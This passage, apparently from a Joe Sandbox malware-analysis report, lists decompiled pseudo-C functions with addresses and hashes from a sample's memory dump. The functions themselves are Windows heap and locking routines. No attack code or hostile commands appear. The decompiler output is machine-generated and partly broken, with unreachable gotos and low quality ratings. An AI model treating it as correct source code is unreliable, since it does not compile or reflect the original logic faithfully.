                                                    0x01888d67
                                                    0x01888d79
                                                    0x01888d7a
                                                    0x01888d7c
                                                    0x01888d81
                                                    0x01888d94

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9a324cc90253686ab32afee89da97bd3c4c235656563548cc2860b4ca90032f8
                                                    • Instruction ID: 0572d78bf470337c6dd10ddde8eae6b6b215b1430b2a595eb84227f4f1d687f8
                                                    • Opcode Fuzzy Hash: 9a324cc90253686ab32afee89da97bd3c4c235656563548cc2860b4ca90032f8
                                                    • Instruction Fuzzy Hash: 67F0B470A0460D9FDB14EFB8D445B6EB7B4EF14300F908099FA05EB384EA34DA00CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01888B58 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 36%
                                                    			E01888B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x18ad360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E017D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                    0x01888b67
                                                    0x01888b6f
                                                    0x01888b72
                                                    0x01888b7d
                                                    0x01888b8f
                                                    0x01888b7f
                                                    0x01888b88
                                                    0x01888b88
                                                    0x01888b9a
                                                    0x01888b9b
                                                    0x01888b9d
                                                    0x01888ba2
                                                    0x01888bb5

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3161e19e0c569dbba2bddf267ea63f109ebe590386faccbdc7fa68730af8dca2
                                                    • Instruction ID: aefb7946635afa9436c1ee85df52a59b3ab2739d29c52b05e736021844130f28
                                                    • Opcode Fuzzy Hash: 3161e19e0c569dbba2bddf267ea63f109ebe590386faccbdc7fa68730af8dca2
                                                    • Instruction Fuzzy Hash: 5AF082B0A1425DABDB14EBA8D90AE7FB7B4EF44304F840459BA05DB384FA34DA00C794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017D746D Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E017D746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E017CEB70(__ecx, 0x18a79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E017F95D0();
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                    0x017d746d
                                                    0x017d746d
                                                    0x017d746d
                                                    0x017d7471
                                                    0x017d7488
                                                    0x0181f92d
                                                    0x017d748e
                                                    0x017d7491
                                                    0x017d7495
                                                    0x0181f937
                                                    0x0181f93a
                                                    0x0181f94e
                                                    0x0181f953
                                                    0x0181f956
                                                    0x0181f956
                                                    0x017d7495
                                                    0x00000000
                                                    0x017d7488
                                                    0x017d7473
                                                    0x017d7478
                                                    0x017d747d
                                                    0x017d7481
                                                    0x00000000
                                                    0x017d7481
                                                    0x017d747d
                                                    0x017d747a
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 17ded2c1324d17469e63bbaaf573df16890cdd8495c60d8763f83423a68cb673
                                                    • Instruction ID: f6b2697262158f728af94e440bcc27a3d9344194e3f1cc9bc8801526cd027f5f
                                                    • Opcode Fuzzy Hash: 17ded2c1324d17469e63bbaaf573df16890cdd8495c60d8763f83423a68cb673
                                                    • Instruction Fuzzy Hash: 9DF0B43550514DAADF0B9B7CC440B79FF71AF04318F540159D591AF155E7259801C7D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01888CD6 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 36%
                                                    			E01888CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x18ad360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E017D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E017FB640(E017F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                    0x01888ce5
                                                    0x01888ced
                                                    0x01888cf0
                                                    0x01888cfb
                                                    0x01888d0d
                                                    0x01888cfd
                                                    0x01888d06
                                                    0x01888d06
                                                    0x01888d18
                                                    0x01888d19
                                                    0x01888d1b
                                                    0x01888d20
                                                    0x01888d33

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 713f6255ae432ce780c567441f6320589583c71833a81d4666a72047879fb063
                                                    • Instruction ID: 2781f02abe1e4dae3ebd03f1082edcd0412462a1f6734c6894184b12922e9495
                                                    • Opcode Fuzzy Hash: 713f6255ae432ce780c567441f6320589583c71833a81d4666a72047879fb063
                                                    • Instruction Fuzzy Hash: 0AF08270A0420DABDB04EFA9D949E6FB7B4EF19304F900199FA15EB385EA34DA00CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017B4F2E Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017B4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E018888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E017DC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1791030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                    0x017b4f2e
                                                    0x017b4f34
                                                    0x017b4f38
                                                    0x01810b85
                                                    0x01810b85
                                                    0x01810b89
                                                    0x01810b9a
                                                    0x01810b9a
                                                    0x01810b9f
                                                    0x00000000
                                                    0x01810b9f
                                                    0x01810b94
                                                    0x01810b98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01810b98
                                                    0x017b4f3e
                                                    0x017b4f48
                                                    0x00000000
                                                    0x017b4f6e
                                                    0x00000000
                                                    0x017b4f70

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb240dceabb86af90637c6c22d3d79313066c5004e010a39da73de59bb447390
                                                    • Instruction ID: bbf5e5a665d4c796a99a0c8f50cb306d26ee94b403653a9f00166e5ce6a84ad0
                                                    • Opcode Fuzzy Hash: fb240dceabb86af90637c6c22d3d79313066c5004e010a39da73de59bb447390
                                                    • Instruction Fuzzy Hash: 38F0BE735256858FD762DB5CC984B22B7E8BB00778F544466E406C792AC724EA84C640
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EA44B Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017EA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x18a7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E017FFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                    0x017ea44b
                                                    0x017ea453
                                                    0x017ea472
                                                    0x017ea476
                                                    0x00000000
                                                    0x017ea493
                                                    0x017ea47a
                                                    0x017ea47f
                                                    0x017ea486
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 82ca62e25a3b90caa88ebc4c097cbf615712c51c2fb9cc6d0c720b0dd2c700c4
                                                    • Instruction ID: a0efbc822c28681560b7821463f7d5f62e4fa8f0eb8db3a24d1635c0e8b699d0
                                                    • Opcode Fuzzy Hash: 82ca62e25a3b90caa88ebc4c097cbf615712c51c2fb9cc6d0c720b0dd2c700c4
                                                    • Instruction Fuzzy Hash: FFE09273A01422ABD2225B1CEC04F67B3EDDBE5651F0A4039E605C7214DA28DE12C7E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017BF358 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E017BF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E017EF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L017D4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                    0x017bf35d
                                                    0x017bf361
                                                    0x017bf367
                                                    0x017bf372
                                                    0x017bf38c
                                                    0x017bf38c
                                                    0x017bf394

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                    • Instruction ID: c6d00db1dba76795bebb90b14913ff81ba2efa7ad9729782fb17b5b8621dae64
                                                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                    • Instruction Fuzzy Hash: 5DE0DF32A41118FBDB21AAD99E09FAAFFBCDB58E60F000196FA08D7550D6719E00D3D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017CFF60 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017CFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x17911a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E018888F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E017D0050(_t14);
				}
			}










                                                    0x017cff66
                                                    0x017cff6b
                                                    0x00000000
                                                    0x017cff8f
                                                    0x00000000
                                                    0x017cff8f

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: df103395259ee9c90af7e0e524ae95d967877fa6197667e74e3c1d34e7bb405a
                                                    • Instruction ID: 499ddb31411eff351b04155caceaee324f49f81bc0a425e57b98b5c52bb9ae55
                                                    • Opcode Fuzzy Hash: df103395259ee9c90af7e0e524ae95d967877fa6197667e74e3c1d34e7bb405a
                                                    • Instruction Fuzzy Hash: 6FE026B0209206EFDB36DB59E044F29FBAEDF52F31F19805DF0084B102C621DA80C28A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 018441E8 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E018441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x18908f0);
				_t5 = E0180D08C(__ebx, __edi, __esi);
				if( *0x18a87ec == 0) {
					E017CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x18a87ec == 0) {
						 *0x18a87f0 = 0x18a87ec;
						 *0x18a87ec = 0x18a87ec;
						 *0x18a87e8 = 0x18a87e4;
						 *0x18a87e4 = 0x18a87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01844248();
				}
				return E0180D0D1(_t5);
			}





                                                    0x018441e8
                                                    0x018441ea
                                                    0x018441ef
                                                    0x018441fb
                                                    0x01844206
                                                    0x0184420b
                                                    0x01844216
                                                    0x0184421d
                                                    0x01844222
                                                    0x0184422c
                                                    0x01844231
                                                    0x01844231
                                                    0x01844236
                                                    0x0184423d
                                                    0x0184423d
                                                    0x01844247

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4107dcc72f164af4a0840270269f572b2c18784cd00685c9847659d88fcd3c50
                                                    • Instruction ID: 020b687defdfa61fbd762b27a0221af86f1fb0f8463b85038f02b5b87245d6bb
                                                    • Opcode Fuzzy Hash: 4107dcc72f164af4a0840270269f572b2c18784cd00685c9847659d88fcd3c50
                                                    • Instruction Fuzzy Hash: A2F03974920719CFEBB1EFA9D9047143EB4F756312F80411AD104C7288EB7447A4CF22
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0186D380 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0186D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L017BE8B0(__ecx, _a4, 0xfff);
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                    0x0186d38a
                                                    0x0186d39b
                                                    0x0186d3b1
                                                    0x00000000
                                                    0x0186d3b6
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                    • Instruction ID: 8506ad55c071d565c588ad051fb8e39c5b8098cd1675166815b8140ae91c66a7
                                                    • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                    • Instruction Fuzzy Hash: 7AE0C231380609BBDB225E84CD00FA9BB2ADB607A4F104031FE489A790DA719D91D6C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EA185 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017EA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x18a67e4 >= 0xa) {
					if(_t5 < 0x18a6800 || _t5 >= 0x18a6900) {
						return L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E017D0010(0x18a67e0, _t5);
				}
			}





                                                    0x017ea190
                                                    0x017ea1a6
                                                    0x017ea1c2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017ea192
                                                    0x017ea192
                                                    0x017ea19f
                                                    0x017ea19f

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 854fd84107721ae073eace3f9530a60de2cb1595bbc989a8130cc73a54b88a4d
                                                    • Instruction ID: cd4a9e3f505404b14c0bcab1bca3fdcc25483ecc3d090cc067b22feef1a6c46a
                                                    • Opcode Fuzzy Hash: 854fd84107721ae073eace3f9530a60de2cb1595bbc989a8130cc73a54b88a4d
                                                    • Instruction Fuzzy Hash: CDD02E611300006BE62D2300881CB25BBF2F788760FBE480CF3038B9AEFA74C9D88209
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E16E0 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017E16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E017E1710(0x18a67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L017D4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                    0x017e16e8
                                                    0x017e16ef
                                                    0x017e16f3
                                                    0x017e16fe
                                                    0x00000000
                                                    0x017e1700
                                                    0x017e170d
                                                    0x017e170d
                                                    0x017e16f2
                                                    0x017e16f2
                                                    0x017e16f2
                                                    0x017e16f2

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af3b0d0a4d43b50573bce657d2360722b9a0481c237901e2fbe6cc5ff43154b8
                                                    • Instruction ID: 74c4824f8eb149f80629e5a57303bf45902b2e1fd40d232a487df4f901d49d65
                                                    • Opcode Fuzzy Hash: af3b0d0a4d43b50573bce657d2360722b9a0481c237901e2fbe6cc5ff43154b8
                                                    • Instruction Fuzzy Hash: 08D0A73124010192EA2D5F14984DB1466E1EB98B81F78005CF307498D0DFB0CDA2E448
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 018353CA Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E018353CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E017CEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                    0x018353ca
                                                    0x018353ce
                                                    0x018353d9
                                                    0x018353de
                                                    0x018353e1
                                                    0x018353e1
                                                    0x018353e6
                                                    0x018353f3
                                                    0x00000000
                                                    0x018353f8
                                                    0x018353fb

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                    • Instruction ID: ca3f5e50872d5c6160dbcb62947b4558e18ff856716fc5516720c41f975dcc6e
                                                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                    • Instruction Fuzzy Hash: 35E08C329006849BCF12DF4CC654F5EFBF5FB85B00F190418A0089B620C634AE00CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017CAAB0 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017CAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                    0x017caab6
                                                    0x017caabb
                                                    0x0181a442
                                                    0x00000000
                                                    0x0181a448
                                                    0x0181a454
                                                    0x0181a454
                                                    0x017caac1
                                                    0x017caac1
                                                    0x017caac6
                                                    0x017caac6

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction ID: 3e2b3c08216b8301fe9dc389befe723bd7727c253ab1902d31973fc2cf420873
                                                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction Fuzzy Hash: 3CD0E939352990CFD61BCB1DC594B1577A8BB44B45FC50494E541CB766E62DDA84CA00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E35A1 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017E35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E017CEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                    0x017e35a1
                                                    0x017e35a1
                                                    0x017e35a5
                                                    0x017e35ab
                                                    0x017e35ab
                                                    0x017e35b5
                                                    0x00000000
                                                    0x017e35c1
                                                    0x017e35b7

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction ID: 3c2be9a08d827b186e47ea89e80c931ec2b24c2cfb13a39fa9e8d5e602143a96
                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction Fuzzy Hash: BDD0C9315511859AEB52AB78C21CB78FBF2BB08718F7820A9954607A56C33A4A5AD601
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017BDB40 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017BDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L017D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                    0x017bdb4d
                                                    0x017bdb54
                                                    0x017bdb5f
                                                    0x017bdb56
                                                    0x017bdb56
                                                    0x017bdb5c
                                                    0x017bdb5c

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction ID: 0ceb7a2874dcd557be215550f0921cb0b9ef02fb6afc843e6a683761d536e676
                                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction Fuzzy Hash: 69C08C30280A01AAEB321F20CD41B41BAA0BB10B09F4400A06302DA4F0DB78DC01E600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0183A537 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0183A537(intOrPtr _a4, intOrPtr _a8) {

				return L017D8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                    0x0183a553

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction ID: 82fbffec08e32f0325a10a0f2e97a6d46237b16168006dddf74bc21a67d84e88
                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction Fuzzy Hash: A5C01232080248BBCB126E81CC00F06BB2AEBA8B60F008010FA080A5608632E970EA94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017D3A1C Relevance: .0, Instructions: 10COMMON
